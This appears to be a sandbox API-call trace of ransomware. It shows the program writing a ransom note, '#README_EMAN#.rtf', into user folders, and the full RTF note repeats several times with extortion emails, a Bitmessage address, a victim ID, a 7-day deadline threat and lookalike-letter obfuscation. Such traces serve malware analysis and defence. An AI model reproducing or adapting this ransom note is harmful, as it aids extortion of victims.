FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n¨C\x0e\x08¸´ês©&\n1\x02#ý{z£d-º°\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0300.127] WriteFile (in: hFile=0x2d4, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0300.128] CloseHandle (hObject=0x2d4) returned 1 [0300.128] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sr-cyrl-rs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\sr-cyrl-rs\\#readme_eman#.rtf")) returned 0xffffffff [0300.128] GetLastError () returned 0x2 [0300.128] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\sr-cyrl-rs\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\sr-cyrl-rs\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0300.129] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.129] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0300.129] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that 